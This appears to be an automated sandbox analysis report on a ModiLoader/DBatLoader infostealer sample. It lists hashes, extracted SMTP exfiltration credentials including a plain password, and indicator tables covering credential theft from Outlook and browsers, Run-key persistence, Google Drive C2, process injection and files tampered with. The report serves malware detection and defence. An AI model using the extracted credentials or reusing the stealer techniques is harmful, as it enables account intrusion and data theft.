modiloader | 6ffd546c1fa5b5e0bd0b5be08ef6c7d19efd4eca8de2f523fe23961a53d438d7

Resubmissions

21-01-2025 14:23

250121-rqhp2axpfs 10

21-01-2025 14:20

250121-rnp2bsykcp 10

Analysis

max time kernel
566s
max time network
568s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-01-2025 14:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe
Size

1.1MB
MD5

4603c75b3b7ae5c693adf7d08dfc72f8
SHA1

536fbca93073cbc2a19ed9be874086bc3acab2d5
SHA256

c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c
SHA512

237927752e93a65c93a6cfdbac6d6499a29c518a316d4fc3b0e6f1d736e84279ae1017e369b2fb0f25fd1970775622d493120a0792902aa6009fd91d5d4a4d81
SSDEEP

24576:WCcGj5EfZJsVJrjzh4dYEXvVzlFjG31di:Wi8GadRvVR2D

Score

10^/10

modiloader collection discovery persistence spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
lwaziacademy.com
Port:
587
Username:
[email protected]
Password:
jB_PZJCJu8Xz

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/384-2-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-9-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-15-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-8-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-13-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-7-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-10-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-17-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-11-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-12-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-14-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-23-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-25-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-24-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-26-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-16-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-18-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-33-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-36-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-21-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-20-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-37-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-38-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-22-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-39-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-30-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-31-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-28-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-27-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-29-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-56-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-41-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-72-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-71-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-70-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-68-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-67-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-64-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-66-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-62-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-47-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-45-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-61-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-59-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-58-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-40-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-48-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-50-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-49-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-63-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-60-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-46-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-42-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-52-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-53-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-35-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-19-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-34-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-32-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-44-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2
behavioral1/memory/384-43-0x0000000002A40000-0x0000000003A40000-memory.dmp	modiloader_stage2

Executes dropped EXE 34 IoCs

pid	Process
4192	svchost.pif
1248	alpha.pif
4172	Upha.pif
4432	alpha.pif
3300	Upha.pif
3324	alpha.pif
4084	aken.pif
4332	hvphrsqL.pif
3084	alg.exe
4408	DiagnosticsHub.StandardCollector.Service.exe
5624	fxssvc.exe
5712	elevation_service.exe
5812	maintenanceservice.exe
5964	msdtc.exe
6124	OSE.EXE
3844	PerceptionSimulationService.exe
3424	perfhost.exe
4588	locator.exe
1352	SensorDataService.exe
3156	snmptrap.exe
832	spectrum.exe
5244	ssh-agent.exe
1164	TieringEngineService.exe
5416	AgentService.exe
2348	vds.exe
1184	vssvc.exe
920	wbengine.exe
3568	WmiApSrv.exe
2116	SearchIndexer.exe
5524	7zG.exe
2368	4e38df6415cd9a8857c5ff4185da103fa8585e8a589ff2286eaf7317e3d10755.exe
4208	7zG.exe
4624	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe
3620	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe

Loads dropped DLL 1 IoCs

pid	Process
4192	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	hvphrsqL.pif
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	hvphrsqL.pif
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	hvphrsqL.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Lqsrhpvh = "C:\\Users\\Public\\Lqsrhpvh.url"	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	SearchIndexer.exe
File opened (read-only)	\??\j:	SearchIndexer.exe
File opened (read-only)	\??\K:	SearchIndexer.exe
File opened (read-only)	\??\V:	SearchIndexer.exe
File opened (read-only)	\??\x:	SearchIndexer.exe
File opened (read-only)	\??\h:	SearchIndexer.exe
File opened (read-only)	\??\I:	SearchIndexer.exe
File opened (read-only)	\??\o:	SearchIndexer.exe
File opened (read-only)	\??\q:	SearchIndexer.exe
File opened (read-only)	\??\T:	SearchIndexer.exe
File opened (read-only)	\??\u:	SearchIndexer.exe
File opened (read-only)	\??\w:	SearchIndexer.exe
File opened (read-only)	\??\W:	SearchIndexer.exe
File opened (read-only)	\??\a:	SearchIndexer.exe
File opened (read-only)	\??\b:	SearchIndexer.exe
File opened (read-only)	\??\k:	SearchIndexer.exe
File opened (read-only)	\??\O:	SearchIndexer.exe
File opened (read-only)	\??\r:	SearchIndexer.exe
File opened (read-only)	\??\R:	SearchIndexer.exe
File opened (read-only)	\??\t:	SearchIndexer.exe
File opened (read-only)	\??\Y:	SearchIndexer.exe
File opened (read-only)	\??\A:	SearchIndexer.exe
File opened (read-only)	\??\D:	SearchIndexer.exe
File opened (read-only)	\??\g:	SearchIndexer.exe
File opened (read-only)	\??\L:	SearchIndexer.exe
File opened (read-only)	\??\M:	SearchIndexer.exe
File opened (read-only)	\??\e:	SearchIndexer.exe
File opened (read-only)	\??\i:	SearchIndexer.exe
File opened (read-only)	\??\U:	SearchIndexer.exe
File opened (read-only)	\??\X:	SearchIndexer.exe
File opened (read-only)	\??\m:	SearchIndexer.exe
File opened (read-only)	\??\n:	SearchIndexer.exe
File opened (read-only)	\??\S:	SearchIndexer.exe
File opened (read-only)	\??\v:	SearchIndexer.exe
File opened (read-only)	\??\Z:	SearchIndexer.exe
File opened (read-only)	\??\B:	SearchIndexer.exe
File opened (read-only)	\??\J:	SearchIndexer.exe
File opened (read-only)	\??\p:	SearchIndexer.exe
File opened (read-only)	\??\s:	SearchIndexer.exe
File opened (read-only)	\??\y:	SearchIndexer.exe
File opened (read-only)	\??\F:	SearchIndexer.exe
File opened (read-only)	\??\G:	SearchIndexer.exe
File opened (read-only)	\??\H:	SearchIndexer.exe
File opened (read-only)	\??\l:	SearchIndexer.exe
File opened (read-only)	\??\N:	SearchIndexer.exe
File opened (read-only)	\??\P:	SearchIndexer.exe
File opened (read-only)	\??\Q:	SearchIndexer.exe
File opened (read-only)	\??\z:	SearchIndexer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	drive.google.com
3	drive.google.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
304	reallyfreegeoip.org
1	reallyfreegeoip.org
5	checkip.dyndns.org
25	reallyfreegeoip.org
223	checkip.dyndns.org
223	reallyfreegeoip.org
270	reallyfreegeoip.org

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWow64\perfhost.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\locator.exe	hvphrsqL.pif
File opened for modification	C:\Windows\System32\snmptrap.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\msiexec.exe	msdtc.exe
File opened for modification	C:\Windows\system32\AgentService.exe	msdtc.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	locator.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\cversions.3.db	SensorDataService.exe
File opened for modification	C:\Windows\system32\SearchIndexer.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\AgentService.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\msiexec.exe	locator.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\wbengine.exe	locator.exe
File opened for modification	C:\Windows\system32\msiexec.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\msiexec.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\msiexec.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\7da15af33214207c.bin	alg.exe
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\SgrmBroker.exe	msdtc.exe
File opened for modification	C:\Windows\System32\alg.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\msiexec.exe	hvphrsqL.pif
File opened for modification	C:\Windows\System32\SensorDataService.exe	locator.exe
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	hvphrsqL.pif
File opened for modification	C:\Windows\System32\SensorDataService.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\AgentService.exe	alg.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	locator.exe
File opened for modification	C:\Windows\system32\AgentService.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\cversions.3.db	spectrum.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\system32\AgentService.exe	OSE.EXE
File opened for modification	C:\Windows\system32\TieringEngineService.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	OSE.EXE
File opened for modification	C:\Windows\system32\wbengine.exe	OSE.EXE
File opened for modification	C:\Windows\system32\wbengine.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	locator.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db	spectrum.exe
File opened for modification	C:\Windows\system32\wbengine.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	OSE.EXE
File opened for modification	C:\Windows\system32\fxssvc.exe	OSE.EXE
File opened for modification	C:\Windows\system32\SgrmBroker.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\dllhost.exe	locator.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\AgentService.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	msdtc.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\system32\dllhost.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\SgrmBroker.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	msdtc.exe
File opened for modification	C:\Windows\System32\msdtc.exe	hvphrsqL.pif
File opened for modification	C:\Windows\system32\vssvc.exe	hvphrsqL.pif
File opened for modification	C:\Windows\System32\SensorDataService.exe	alg.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	msdtc.exe
File opened for modification	C:\Windows\system32\dllhost.exe	msdtc.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\spectrum.exe	hvphrsqL.pif

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 384 set thread context of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 4624 set thread context of 4788	4624	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe	178
PID 3620 set thread context of 4736	3620	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe	180

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	hvphrsqL.pif
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmid.exe	OSE.EXE
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe	msdtc.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	OSE.EXE
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	locator.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	PerceptionSimulationService.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	locator.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	PerceptionSimulationService.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	locator.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	PerceptionSimulationService.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	locator.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	msdtc.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe	OSE.EXE
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	PerceptionSimulationService.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kinit.exe	locator.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	OSE.EXE
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	locator.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	OSE.EXE
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{B797B560-3510-4FE9-BCA6-90913C6AEB1C}\chrome_installer.exe	OSE.EXE
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	locator.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe	OSE.EXE
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\servertool.exe	msdtc.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe	locator.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsgen.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\dotnet\dotnet.exe	msdtc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	msdtc.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe	PerceptionSimulationService.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	locator.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe	PerceptionSimulationService.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	msdtc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	locator.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	hvphrsqL.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	msdtc.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	OSE.EXE
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	hvphrsqL.pif
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	PerceptionSimulationService.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	locator.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	msdtc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hvphrsqL.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4e38df6415cd9a8857c5ff4185da103fa8585e8a589ff2286eaf7317e3d10755.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
